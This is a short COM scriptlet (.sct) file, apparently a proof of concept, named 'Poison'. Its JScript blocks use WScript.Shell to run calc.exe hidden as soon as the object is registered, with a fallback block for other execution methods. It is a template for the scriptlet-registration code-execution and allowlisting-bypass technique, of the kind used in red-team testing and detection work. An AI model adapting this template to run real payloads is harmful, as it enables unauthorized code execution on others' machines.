<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Poison"
    classid="{F0001111-0000-0000-0000-000000000000}" >
    <script language="JScript">
        <![CDATA[
            // This runs as soon as the object is registered
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe", 0);
        ]]>
    </script>
</registration>

<script language="JScript">
    <![CDATA[
        // This acts as a fallback for some execution methods
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe", 0);
    ]]>
</script>
</scriptlet>
